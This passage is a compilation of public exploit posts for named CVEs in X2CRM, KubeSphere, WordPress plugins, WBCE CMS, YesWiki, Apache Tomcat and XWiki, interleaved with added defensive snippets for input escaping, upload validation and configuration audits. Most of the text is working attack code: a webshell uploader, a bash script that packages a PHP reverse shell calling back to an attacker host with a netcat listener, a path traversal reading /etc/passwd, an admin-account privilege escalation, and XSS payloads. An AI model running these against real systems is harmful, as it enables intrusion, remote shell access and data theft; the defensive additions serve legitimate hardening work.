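    return payload if isinstance(payload, dict) else None


def forged_admin_token(legit_token):
    """The post's step: copy the payload, set userId to 1, re-sign with an empty key."""
    _, p, _ = legit_token.split(".")
    payload = json.loads(b64url_decode(p))
    payload["userId"] = 1
    return sign_hs256(payload, b"")


if __name__ == "__main__":
    legit = sign_hs256({"userId": 7, "username": "dummy"}, SERVER_SECRET)
    print("legit  :", verify_hs256(legit, SERVER_SECRET))
    print("forged :", verify_hs256(forged_admin_token(legit), SERVER_SECRET))
```

Two points follow from the script. First, the forgery only works because the server's signing key was guessable; a random key of 32 bytes or more makes `jwt.encode(..., '')` produce a token this verifier throws away. Second, `userId` in the token should select the account, not grant rights: the permission level the script changes should be read from the server's user record on each request, so even a valid token cannot carry an elevated role.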
  10. # Exploit Title: X2CRM 8.5 - Stored Cross-Site Scripting (XSS)
# Date: 12 September 2024
# Exploit Author: Okan Kurtulus
# Vendor Homepage: https://x2engine.com/
# Software Link: https://github.com/X2Engine/X2CRM
# Version: X2CRM v8.5
# Tested on: Ubuntu 22.04
# CVE : CVE-2024-48120

1-) Log in to the system with any user account. Navigate to the “Opportunities” section from the top menu and select “Create List.” In the “Name” field of the new screen, enter the malicious XSS payload and click “Create.”

2-) Next, return to the “Opportunities” tab and click on “Lists” again. The stored XSS payload will be triggered.

XSS Trigger Request:

```
POST /x2crm/x2engine/index.php/opportunities/createList HTTP/1.1
Host: 192.168.1.108
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 390
Origin: http://192.168.1.108
Connection: keep-alive
Referer: http://192.168.1.108/x2crm/x2engine/index.php/opportunities/createList
Cookie: PHPSESSID=uijrtnp42qqo29vfkb4v0sps3i; YII_CSRF_TOKEN=Rkw1SWxTc1dpa0Z0OGdpb1RxY0ZGVDY5X3pPMzVFTDGjgT_kJmGLFkvRCi_Y9OO4f0QIHNTvqbSw1t9UVVXL4g%3D%3D; 5d8630d289284e8c14d15b14f4b4dc28=9d5b82f1240eb47cd73a20df560d9b3086847e33a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%223%22%3Bi%3A1%3Bs%3A4%3A%22test%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; LoginForm[username]=test; LoginForm[rememberMe]=1
Upgrade-Insecure-Requests: 1
Priority: u=0, i

YII_CSRF_TOKEN=Rkw1SWxTc1dpa0Z0OGdpb1RxY0ZGVDY5X3pPMzVFTDGjgT_kJmGLFkvRCi_Y9OO4f0QIHNTvqbSw1t9UVVXL4g%3D%3D&X2List%5Bname%5D=%3Cscript%3Ealert%282%29%3B%3C%2Fscript%3E&X2List%5Btype%5D=dynamic&X2List%5BassignedTo%5D=test2&X2List%5Bvisibility%5D=1&X2List%5BlogicType%5D=AND&X2List%5Battribute%5D%5B%5D=alternativeEmail&X2List%5Bcomparison%5D%5B%5D=%3D&X2List%5Bvalue%5D%5B%5D=test&yt0=Create
```
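Added example covering the Gitea post (item 2) and this X2CRM post, not code from either author: a check that URL-decodes a form body and flags fields whose decoded value contains HTML tags, run over bodies constructed from the two requests' parameters, next to the output-encoding step that renders such a value as text instead of markup. CSRF tokens are replaced with the placeholder `TOKEN`.

```python
# Added example (not from either post): flag form fields carrying markup and
# show the output encoding that neutralises them. Bodies are constructed from
# the two requests; TOKEN is a placeholder for the CSRF values.
import html
import re
from urllib.parse import parse_qs

# An opening or closing tag: '<', optional '/', a tag name starting with a letter
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")

GITEA_BODY = ("_csrf=TOKEN&full_name=Abuzettin&description=%3Ch1%3Edeneme%3C%2Fh1%3E"
              "&website=&location=&visibility=0&keep_email_private=on")
X2CRM_BODY = ("YII_CSRF_TOKEN=TOKEN&X2List%5Bname%5D=%3Cscript%3Ealert%282%29%3B%3C%2Fscript%3E"
              "&X2List%5Btype%5D=dynamic&X2List%5BassignedTo%5D=test2&yt0=Create")
BENIGN_BODY = "full_name=Jane&description=Backend+engineer%2C+likes+%3C3+Go&visibility=0"


def flag_markup_params(body):
    """Return {param: decoded_value} for every field whose decoded value contains a tag.
    Decoding first matters: the payloads arrive as %3Cscript%3E, not <script>."""
    params = parse_qs(body, keep_blank_values=True)
    return {k: v for k, values in params.items() for v in values if TAG_RE.search(v)}


def render_profile_field(value):
    """Output encoding at render time: the stored text is displayed verbatim but
    the browser never sees it as markup."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for label, body in (("gitea", GITEA_BODY), ("x2crm", X2CRM_BODY), ("benign", BENIGN_BODY)):
        flagged = flag_markup_params(body)
        print(label, flagged)
        for value in flagged.values():
            print("  rendered as:", render_profile_field(value))
```

Flagging inbound requests is a detection aid, not the fix: `<3` and similar text must stay allowed, and attackers vary encodings. The fix is `render_profile_field` applied wherever the stored description or list name is written into HTML, or a sanitiser with an explicit tag allow-list if rich text is a feature.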
  11. # Exploit Title: KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR)
# Date: 3 September
# Exploit Author: Okan Kurtulus
# Vendor Homepage: https://kubesphere.io
# Software Link: https://github.com/kubesphere/kubesphere
# Version: [>= 4.0.0 & < 4.1.3] , [>= 3.0.0 & < 3.4.1]
# Tested on: Ubuntu 22.04
# CVE : CVE-2024-46528

1-) Log in to the system with a user who is not registered to any workspace (e.g., a "platform-regular" user who has limited authorization).
Note: The authorization level of this user is as follows: "Cannot access any resources before joining a workspace."

2-) After logging in with this user, it has been observed that cluster information, node information, users registered in the system, and other similar areas can be accessed without the user being registered to any workspace or cluster.

Examples of accessible endpoints:

```
http://xxx.xxx.xx.xx:30880/clusters/default/overview
http://xxx.xxx.xx.xx:30880/clusters/default/nodes
http://xxx.xxx.xx.xx:30880/access/accounts
http://xxx.xxx.xx.xx:30880/clusters/default/monitor-cluster/ranking
http://xxx.xxx.xx.xx:30880/clusters/default/monitor-cluster/resource
http://xxx.xxx.xx.xx:30880/clusters/default/projects
http://xxx.xxx.xx.xx:30880/clusters/default/nodes/minikube/pods
http://xxx.xxx.xx.xx:30880/clusters/default/kubeConfig
```
  12. # Exploit Title: WordPress Backup and Staging Plugin ≤ 1.21.16 - Arbitrary File Upload to RCE
# Original Author: Patchstack (hypothetical)
# Exploit Author: Al Baradi Joy
# Exploit Date: April 5, 2025
# Vendor Homepage: https://wp-timecapsule.com/
# Software Link: https://wordpress.org/plugins/wp-time-capsule/
# Version: Up to and including 1.21.16
# Tested Versions: 1.21.16
# CVE ID: CVE-2024-8856
# Vulnerability Type: Arbitrary File Upload / Remote Code Execution
# Description:
#   The WordPress plugin "Backup and Staging by WP Time Capsule" up to version 1.21.16
#   allows unauthenticated attackers to upload arbitrary files via the upload.php endpoint.
#   This can lead to remote code execution if a PHP file is uploaded and executed directly
#   from the wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/ directory.
# Proof of Concept: Yes
# Categories: WordPress Plugin, File Upload, RCE
# CVSS Score: 9.9 (Critical)
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
# Notes:
#   Successful exploitation provides shell access as the user running the web server.
#   Ensure target is using the vulnerable plugin version before launching the attack.

```python
import requests


# Banner
def display_banner():
    print("=" * 80)
    print("Exploit Title: CVE-2024-8856 - WordPress Backup and Staging Plugin Arbitrary File Upload")
    print("Made By Al Baradi Joy")
    print("=" * 80)


# Detect whether the target supports HTTPS, falling back to HTTP
def detect_protocol(domain):
    https_url = f"https://{domain}"
    http_url = f"http://{domain}"

    try:
        response = requests.get(https_url, timeout=5, allow_redirects=True)
        if response.status_code < 400:
            print(f"[✔] Target supports HTTPS: {https_url}")
            return https_url
    except requests.exceptions.RequestException:
        print("[!] HTTPS not available, falling back to HTTP.")

    try:
        response = requests.get(http_url, timeout=5, allow_redirects=True)
        if response.status_code < 400:
            print(f"[✔] Target supports HTTP: {http_url}")
            return http_url
    except requests.exceptions.RequestException:
        pass

    print("[✖] Target is unreachable on both HTTP and HTTPS.")
    exit(1)


# Exploit function
def exploit(target_url):
    target_url = detect_protocol(target_url.replace("http://", "").replace("https://", "").strip())
    upload_url = f"{target_url}/wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload.php"
    shell_url = f"{target_url}/wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/shell.php?cmd=whoami"

    files = {
        'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')
    }

    try:
        print(f"[+] Attempting to upload shell to: {upload_url}")
        response = requests.post(upload_url, files=files, timeout=10)
        if response.status_code == 200:
            print(f"[✔] Exploit successful! Webshell available at: {shell_url}")
        else:
            print(f"[✖] Failed to upload shell. Status code: {response.status_code}")
    except requests.exceptions.ConnectionError:
        print("[✖] Connection failed. Target may be down.")
    except requests.exceptions.Timeout:
        print("[✖] Request timed out. Target is slow or unresponsive.")
    except requests.exceptions.RequestException as e:
        print(f"[✖] Unexpected error: {e}")


# Main execution
if __name__ == "__main__":
    display_banner()
    target = input("[?] Enter the target URL (without http/https): ").strip()
    exploit(target)
```
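Added example covering the MoziloCMS post (item 8) and this WP Time Capsule post, not code from either author: the name and content validation that an upload handler, and the rename handler that MoziloCMS left unchecked, should apply. The allow-list, the executable-extension list and the magic-byte table are this example's own choices, not the projects' fixes; the request-level gap in the WP Time Capsule case (no authentication on `upload.php`) is a separate check that has to run before any of this.

```python
# Added example (not from either post): validate uploaded and renamed file names
# and check that declared image content really is an image. Lists below are this
# example's choices; the PHP samples are the payloads quoted in the posts.
import re

ALLOWED_IMAGE_EXT = {"jpg", "jpeg", "png", "gif", "webp"}
# Extensions a web server may hand to an interpreter; rejected anywhere in the name,
# so shell.php.jpg fails as well as shell.php
EXECUTABLE_EXT = {"php", "php3", "php4", "php5", "php7", "phtml", "phar",
                  "shtml", "cgi", "pl", "asp", "aspx", "jsp"}
SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,100}$")

MAGIC = {   # leading bytes per allowed type (webp check is loose: RIFF container only)
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "webp": (b"RIFF",),
}


def validate_name(filename):
    """Return (ok, reason). Applied identically to upload names and rename targets."""
    if "/" in filename or "\\" in filename:
        return False, "path separators not allowed"
    if filename in ("", ".", "..") or not SAFE_NAME_RE.match(filename):
        return False, "unsafe characters or empty name"
    parts = filename.lower().split(".")
    if len(parts) < 2 or not parts[-1]:
        return False, "missing extension"
    exts = parts[1:]
    if any(e in EXECUTABLE_EXT for e in exts):
        return False, f"executable extension in name: {filename}"
    if exts[-1] not in ALLOWED_IMAGE_EXT:        # also rejects .htaccess and .phpx
        return False, f"extension .{exts[-1]} not allowed"
    return True, "ok"


def validate_content(filename, data):
    """The declared image type must match the file's magic bytes."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return any(data.startswith(m) for m in MAGIC.get(ext, ()))


def accept_upload(filename, data):
    ok, reason = validate_name(filename)
    if not ok:
        return False, reason
    if not validate_content(filename, data):
        return False, "content does not match declared image type"
    return True, "ok"


def accept_rename(old_name, new_name):
    """Rename is a second upload decision: validate the target name, and do not
    let a rename change the extension (the MoziloCMS .jpg -> .php step)."""
    ok, reason = validate_name(new_name)
    if not ok:
        return False, reason
    if old_name.rsplit(".", 1)[-1].lower() != new_name.rsplit(".", 1)[-1].lower():
        return False, "extension change not permitted"
    return True, "ok"


if __name__ == "__main__":
    print(accept_upload("revshell.jpg", b"<?=`$_GET[0]`?>"))                 # MoziloCMS step 4
    print(accept_rename("revshell.jpg", "revshell.php"))                      # MoziloCMS step 5
    print(accept_upload("shell.php", b"<?php system($_GET['cmd']); ?>"))     # WP Time Capsule
    print(accept_upload("photo.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16))
```

Name checks alone are not enough in either direction: the MoziloCMS PoC passes an extension allow-list at upload time (it is a `.jpg`) and only becomes dangerous at rename, while a file that passes the magic-byte check can still contain PHP after the header if the server is configured to execute files in the upload directory. Storing uploads outside the web root, or serving them with execution disabled, removes the second dependency.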
  13. # Exploit Title: WBCE CMS <= v1.6.3 Authenticated Remote Code Execution (RCE)
# Date: 3/22/2025
# Exploit Author: Swammers8
# Vendor Homepage: https://wbce-cms.org/
# Software Link: https://github.com/WBCE/WBCE_CMS
# Version: 1.6.3 and prior
# Tested on: Ubuntu 24.04.2 LTS
# YouTube Demonstration: https://youtu.be/Dhg5gRe9Dzs?si=-WQoiWU1yqvYNz1e
# Github: https://github.com/Swammers8/WBCE-v1.6.3-Authenticated-RCE

```bash
#!/bin/bash
# Make a zip file exploit
# Start netcat listener

if [[ $# -ne 2 ]]; then
    echo "[*] Description:"
    echo "[*] This is an Authenticated RCE exploit for WBCE CMS version <= 1.6.3"
    echo "[*] It will create an infected module .zip file and start a netcat listener."
    echo "[*] Once the zip is created, you will have to login to the admin page"
    echo "[*] to upload and install the module, which will immediately run the shell"
    echo "[*] Shell taken from: https://github.com/pentestmonkey/php-reverse-shell/tree/master"
    echo "[!] Usage:"
    echo "[*] $0 <lhost> <lport>"
    exit 1
fi

if [ -z "$(which nc)" ]; then
    echo "[!] Netcat is not installed."
    exit 1
fi

ip=$1
port=$2

rm -rf shellModule.zip
rm -rf shellModule
mkdir shellModule

echo "[*] Crafting Payload"

cat <<EOF > shellModule/info.php
<?php
/**
 *
 * @category        modules
 * @package         Reverse Shell
 * @author          Swammers8
 * @link            https://swammers8.github.io/
 * @license         http://www.gnu.org/licenses/gpl.html
 * @platform        example.com
 * @requirements    PHP 5.6 and higher
 * @version         1.3.3.7
 * @lastmodified    May 22 2025
 *
 */

\$module_directory   = 'modshell';
\$module_name        = 'Reverse Shell';
\$module_function    = 'page';
\$module_version     = '1.3.3.7';
\$module_platform    = '2.10.x';
\$module_author      = 'Swammers8';
\$module_license     = 'GNU General Public License';
\$module_description = 'This module is a backdoor';
?>
EOF

cat <<EOF > shellModule/install.php
<?php
set_time_limit (0);
\$VERSION = "1.0";
\$ip = '$ip';  // CHANGE THIS
\$port = $port;  // CHANGE THIS
\$chunk_size = 1400;
\$write_a = null;
\$error_a = null;
\$shell = 'uname -a; w; id; /bin/sh -i';
\$daemon = 0;
\$debug = 0;

if (function_exists('pcntl_fork')) {
    \$pid = pcntl_fork();
    if (\$pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }
    if (\$pid) {
        exit(0);  // Parent exits
    }
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }
    \$daemon = 1;
} else {
    printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}

chdir("/");
umask(0);

\$sock = fsockopen(\$ip, \$port, \$errno, \$errstr, 30);
if (!\$sock) {
    printit("\$errstr (\$errno)");
    exit(1);
}

\$descriptorspec = array(
    0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
    2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

\$process = proc_open(\$shell, \$descriptorspec, \$pipes);
if (!is_resource(\$process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

stream_set_blocking(\$pipes[0], 0);
stream_set_blocking(\$pipes[1], 0);
stream_set_blocking(\$pipes[2], 0);
stream_set_blocking(\$sock, 0);

printit("Successfully opened reverse shell to \$ip:\$port");

while (1) {
    if (feof(\$sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }
    if (feof(\$pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }
    \$read_a = array(\$sock, \$pipes[1], \$pipes[2]);
    \$num_changed_sockets = stream_select(\$read_a, \$write_a, \$error_a, null);
    if (in_array(\$sock, \$read_a)) {
        if (\$debug) printit("SOCK READ");
        \$input = fread(\$sock, \$chunk_size);
        if (\$debug) printit("SOCK: \$input");
        fwrite(\$pipes[0], \$input);
    }
    if (in_array(\$pipes[1], \$read_a)) {
        if (\$debug) printit("STDOUT READ");
        \$input = fread(\$pipes[1], \$chunk_size);
        if (\$debug) printit("STDOUT: \$input");
        fwrite(\$sock, \$input);
    }
    if (in_array(\$pipes[2], \$read_a)) {
        if (\$debug) printit("STDERR READ");
        \$input = fread(\$pipes[2], \$chunk_size);
        if (\$debug) printit("STDERR: \$input");
        fwrite(\$sock, \$input);
    }
}

fclose(\$sock);
fclose(\$pipes[0]);
fclose(\$pipes[1]);
fclose(\$pipes[2]);
proc_close(\$process);

function printit (\$string) {
    if (!\$daemon) {
        print "\$string\n";
    }
}
?>
EOF

echo "[*] Zipping to shellModule.zip"
zip -r shellModule.zip shellModule
rm -rf shellModule
echo "[*] Please login to the WBCE admin panel to upload and install the module"
echo "[*] Starting listener"
nc -lvnp $port
echo
echo
echo "[*] Done!"
echo "[*] Make sure to uninstall the module named 'Reverse Shell' in the module page"
```
14. # Exploit Title: YesWiki < 4.5.2 - Unauthenticated Path Traversal
# Exploit Author: Al Baradi Joy
# Exploit Date: April 6, 2025
# CVE ID: CVE-2025-31131
# Vendor Homepage: https://yeswiki.net/
# Software Link: https://github.com/YesWiki/yeswiki
# Affected Version: < 4.5.2
# Tested On: YesWiki 4.5.1 on Ubuntu 22.04
# Vulnerability Type: Unauthenticated Path Traversal (LFI)
# CVSS Score: 8.6 (High)
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
# Description:
# YesWiki before version 4.5.2 is vulnerable to unauthenticated path traversal via the 'squelette' parameter.
# A remote attacker can exploit this issue to read arbitrary files on the server, such as /etc/passwd.

import requests
import sys

def banner():
    print("=" * 80)
    print(" YesWiki < 4.5.2 - Unauthenticated Path Traversal (CVE-2025-31131)")
    print(" Exploit Author: Al Baradi Joy")
    print("=" * 80)

def exploit(target, filename="/etc/passwd"):
    if not target.startswith("http"):
        target = "http://" + target
    traversal = "../" * 8
    encoded_file = filename.replace("/", "%2f")
    payload = f"/?UrkCEO/edit&theme=margot&squelette={traversal}{encoded_file}&style=margot.css"
    url = target.rstrip("/") + payload
    try:
        print(f"[+] Target: {target}")
        print(f"[+] Attempting to read: (unknown)")
        response = requests.get(url, timeout=10)
        if response.status_code == 200 and "root:" in response.text:
            print("[+] Exploit successful. File contents:\n")
            print(response.text)
        else:
            print("[!] Exploit failed or file not readable.")
            print(f"Status Code: {response.status_code}")
            if len(response.text) < 200:
                print(f"Response:\n{response.text}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")

if __name__ == "__main__":
    banner()
    if len(sys.argv) < 2:
        print(f"Usage: python3 {sys.argv[0]} <target_url> [file_to_read]")
        print(f"Example: python3 {sys.argv[0]} http://victim.com /etc/passwd")
        sys.exit(1)
    target_url = sys.argv[1]
    file_to_read = sys.argv[2] if len(sys.argv) > 2 else "/etc/passwd"
    exploit(target_url, file_to_read)
15. # Exploit Title: Apache Tomcat Path Equivalence - Remote Code Execution
# Exploit Author: Al Baradi Joy
# CVE: CVE-2025-24813
# Date: 2025-04-06
# Vendor Homepage: https://tomcat.apache.org/
# Software Link: https://tomcat.apache.org/download-90.cgi
# Version: Apache Tomcat < 11.0.3 / 10.1.35 / 9.0.98
# Tested on: Apache Tomcat 10.1.33
# CVSS: 9.8 (CRITICAL)
# CWE: CWE-44, CWE-502
# Reference: https://scrapco.de/blog/analysis-of-cve-2025-24813-apache-tomcat-path-equivalence-rce.html

import requests
import random
import string
import sys

def rand_filename(length=6):
    return ''.join(random.choices(string.ascii_lowercase, k=length))

def generate_payload(interact_url):
    # Java serialized payload gadget triggering DNS interaction
    return f'\xac\xed\x00\x05...'  # Replace with actual gadget bytes or generator

def exploit(target, interact_url):
    filename = rand_filename()
    put_url = f"{target}/(unknown).session"
    get_url = f"{target}/(unknown)"
    headers = {
        "Content-Range": "bytes 0-452/457",
        "Content-Type": "application/octet-stream"
    }
    payload = generate_payload(interact_url)
    print("[+] Exploit for CVE-2025-24813")
    print("[+] Made By Al Baradi Joy\n")
    print(f"[+] Uploading payload to: {put_url}")
    r1 = requests.put(put_url, data=payload, headers=headers)
    if r1.status_code == 201:
        print("[+] Payload uploaded successfully.")
    else:
        print(f"[-] Upload failed with status: {r1.status_code}")
        return
    print(f"[+] Triggering payload via: {get_url}")
    cookies = {"JSESSIONID": f".(unknown)"}
    r2 = requests.get(get_url, cookies=cookies)
    print(f"[+] Trigger request sent. Check for DNS callback to: {interact_url}")

if __name__ == "__main__":
    # Display banner first
    print("[+] Exploit for CVE-2025-24813")
    print("[+] Made By Al Baradi Joy\n")
    # Ask the user for the target domain and interact URL
    target_url = input("Enter the target domain (e.g., http://localhost:8080): ")
    interact_url = input("Enter your interactsh URL: ")
    exploit(target_url, interact_url)
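The PUT step in item 15 only works when Tomcat's DefaultServlet has been switched out of its read-only default, so the defender-side check is a configuration audit rather than a network one. The following is an added example, not code from the exploit author or from Apache Tomcat: it parses a conf/web.xml (both stanzas below are constructed) and flags an explicit `readonly=false` on the DefaultServlet, the init-param that enables HTTP PUT/DELETE, together with `allowPartialPut` not being disabled, the init-param that accepts the Content-Range partial upload the request above uses. Matching tags by local name regardless of namespace is an assumption made so the same check handles the javaee and jakartaee schemas.

```python
import xml.etree.ElementTree as ET

# Constructed DefaultServlet stanza from a Tomcat conf/web.xml with the weak
# setting CVE-2025-24813 depends on: an explicit readonly=false enables PUT.
WEAK_WEB_XML = """<web-app xmlns="https://jakarta.ee/xml/ns/jakartaee" version="6.0">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param>
      <param-name>listings</param-name>
      <param-value>false</param-value>
    </init-param>
    <init-param>
      <param-name>readonly</param-name>
      <param-value>false</param-value>
    </init-param>
    <load-on-startup>1</load-on-startup>
  </servlet>
  <servlet>
    <servlet-name>jsp</servlet-name>
    <servlet-class>org.apache.jasper.servlet.JspServlet</servlet-class>
  </servlet>
</web-app>
"""

# The same file with the hardened value, which is also Tomcat's documented default.
HARDENED_WEB_XML = WEAK_WEB_XML.replace(
    "<param-name>readonly</param-name>\n      <param-value>false</param-value>",
    "<param-name>readonly</param-name>\n      <param-value>true</param-value>")


def _local(tag):
    """Strip the XML namespace so javaee and jakartaee schemas are handled alike (assumption)."""
    return tag.rsplit("}", 1)[-1]


def _child_text(elem, name):
    """Text of the first direct child whose local tag name is `name`, else ''."""
    for child in elem:
        if _local(child.tag) == name:
            return (child.text or "").strip()
    return ""


def default_servlet_params(web_xml_text):
    """Return {param-name: param-value} for the servlet backed by DefaultServlet."""
    root = ET.fromstring(web_xml_text)
    params = {}
    for elem in root.iter():
        if _local(elem.tag) != "servlet":
            continue
        if not _child_text(elem, "servlet-class").endswith(".DefaultServlet"):
            continue
        for child in elem:
            if _local(child.tag) == "init-param":
                params[_child_text(child, "param-name")] = _child_text(child, "param-value")
    return params


def audit_default_servlet(web_xml_text):
    """List findings; an empty list means the PUT precondition is absent."""
    params = default_servlet_params(web_xml_text)
    findings = []
    # readonly defaults to true, so only an explicit false turns PUT/DELETE on.
    if params.get("readonly", "true").lower() == "false":
        findings.append("readonly=false: DefaultServlet accepts HTTP PUT/DELETE")
        # allowPartialPut defaults to true, so it only matters once PUT is on.
        if params.get("allowPartialPut", "true").lower() != "false":
            findings.append("allowPartialPut not disabled: Content-Range partial PUT accepted")
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_WEB_XML), ("hardened", HARDENED_WEB_XML)):
        print(label, audit_default_servlet(text) or ["no findings"])
```

Run it against a real `conf/web.xml` by reading the file into `audit_default_servlet`; an empty result removes the PUT precondition, although the advisory's other conditions (file-based session persistence, a deserialization gadget on the classpath) are separate checks.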
16. # Exploit Title: Reservit Hotel < 3.0 - Admin+ Stored XSS
# Date: 2024-10-01
# Exploit Author: Ilteris Kaan Pehlivan
# Vendor Homepage: https://wpscan.com/plugin/reservit-hotel/
# Version: Reservit Hotel 2.1
# Tested on: Windows, WordPress, Reservit Hotel < 3.0
# CVE : CVE-2024-9458

The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).

1. Install and activate Reservit Hotel plugin.
2. Go to Reservit hotel > Content
3. Add the following payload to the Button text > French field and save: " style=animation-name:rotation onanimationstart=alert(/XSS/)//
4. The XSS will trigger upon saving and when any user will access the content dashboard again

References:
https://wpscan.com/vulnerability/1157d6ae-af8b-4508-97e9-b9e86f612550/
https://www.cve.org/CVERecord?id=CVE-2024-9458
17. # Exploit Title: WordPress User Registration & Membership Plugin <= 4.1.1 - Unauthenticated Privilege Escalation
# Exploit Author: Al Baradi Joy
# Date: 2025-04-07
# Vendor Homepage: https://wordpress.org/plugins/user-registration/
# Software Link: https://downloads.wordpress.org/plugin/user-registration.4.1.1.zip
# Version: <= 4.1.1
# Tested on: WordPress 6.4.3
# CVSS: 9.8 (CRITICAL)
# CWE: CWE-269
# References:
# https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration/user-registration-membership-411-unauthenticated-privilege-escalation
# https://patchstack.com/database/wordpress/plugin/user-registration/vulnerability/wordpress-user-registration-membership-plugin-4-1-2-unauthenticated-privilege-escalation-vulnerability
# https://nvd.nist.gov/vuln/detail/CVE-2025-2563

import re
import json
import requests
import random
import string
from urllib.parse import urljoin

def banner():
    print("\n[+] CVE-2025-2563 - WP User Registration Privilege Escalation")
    print("[+] Made By Al Baradi Joy\n")

def randstring(n=8):
    return ''.join(random.choices(string.ascii_lowercase, k=n))

def get_regex(content, pattern, group=1, name=""):
    match = re.search(pattern, content)
    if not match:
        raise ValueError(f"[-] Could not extract {name} (Pattern: {pattern})")
    return match.group(group)

def exploit(target):
    session = requests.Session()
    username = randstring()
    password = randstring() + "!@"
    email = f"{username}@exploit.test"
    try:
        print("[+] Getting registration page...")
        r = session.get(urljoin(target, "/membership-registration/"), timeout=10)
        r.raise_for_status()
        page = r.text
        nonce = get_regex(page, r'"user_registration_form_data_save":"(.*?)"', name="nonce")
        formid = get_regex(page, r"id='user-registration-form-([0-9]+)'", name="formid")
        memval = get_regex(page, r'id="ur-membership-select-membership-([0-9]+)', name="membership value")
        memname = get_regex(page, r'data-field-id="membership_field_([0-9]+)"', name="membership field name")
        front_nonce = get_regex(page, r'name="ur_frontend_form_nonce" value="(.*?)"', name="frontend_nonce")
        loc_nonce = get_regex(page, r'ur_membership_frontend_localized_data = {"_nonce":"(.*?)"', name="localized_frontend_nonce")
        print("[+] Submitting registration form...")
        form_data = [
            {"field_name": "user_login", "value": username, "field_type": "text", "label": "Username"},
            {"field_name": "user_email", "value": email, "field_type": "email", "label": "User Email"},
            {"field_name": "user_pass", "value": password, "field_type": "password", "label": "User Password"},
            {"field_name": "user_confirm_password", "value": password, "field_type": "password", "label": "Confirm Password"},
            {"value": memval, "field_type": "radio", "label": "membership", "field_name": f"membership_field_{memname}"}
        ]
        payload = {
            "action": "user_registration_user_form_submit",
            "security": nonce,
            "form_data": json.dumps(form_data),
            "form_id": formid,
            "registration_language": "en-US",
            "ur_frontend_form_nonce": front_nonce,
            "is_membership_active": memval,
            "membership_type": memval
        }
        r2 = session.post(urljoin(target, "/wp-admin/admin-ajax.php"), data=payload, timeout=10)
        if '"success":true' not in r2.text:
            print("[-] Registration form failed.")
            return
        print("[+] Sending membership registration as administrator...")
        member_payload = {
            "action": "user_registration_membership_register_member",
            "security": loc_nonce,
            "members_data": json.dumps({
                "membership": "1",
                "payment_method": "free",
                "start_date": "2025-3-29",
                "username": username,
                "role": "administrator"
            })
        }
        r3 = session.post(urljoin(target, "/wp-admin/admin-ajax.php"), data=member_payload, timeout=10)
        if '"success":true' in r3.text:
            print("[+] Exploit Successful!")
            print(f"[+] Admin Username: {username}")
            print(f"[+] Admin Password: {password}")
        else:
            print("[-] Membership escalation failed.")
    except Exception as e:
        print(f"[-] Exploit failed: {str(e)}")

if __name__ == "__main__":
    banner()
    target = input("Enter target WordPress site (e.g., http://example.com): ").strip().rstrip('/')
    if not target.startswith("http"):
        target = "http:
18. # Exploit Title: XWiki Platform - Remote Code Execution
# Exploit Author: Al Baradi Joy
# Exploit Date: April 6, 2025
# CVE ID: CVE-2025-24893
# Vendor Homepage: https://www.xwiki.org/
# Software Link: https://github.com/xwiki/xwiki-platform
# Version: Affected versions up to and including XWiki 15.10.10
# Tested Versions: XWiki 15.10.10
# Vulnerability Type: Remote Code Execution (RCE)
# CVSS Score: 9.8 (Critical)
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
# Description:
# XWiki Platform suffers from a critical vulnerability where any guest user can
# execute arbitrary code remotely through the SolrSearch endpoint. This can lead
# to a full server compromise, including the ability to execute commands on the
# underlying system. The vulnerability impacts the confidentiality, integrity,
# and availability of the XWiki installation. The issue has been patched in XWiki
# versions 15.10.11, 16.4.1, and 16.5.0RC1.
# Proof of Concept: Yes
# Categories: XWiki, Remote Code Execution, CVE-2025, RCE
# References:
# - GHSA Advisory: https://github.com/advisories/GHSA-rr6p-3pfg-562j
# - NVD CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2025-24893
# - GitHub Exploit Link: https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py

import requests

# Banner
def display_banner():
    print("="*80)
    print("Exploit Title: CVE-2025-24893 - XWiki Platform Remote Code Execution")
    print("Exploit Author: Al Baradi Joy")
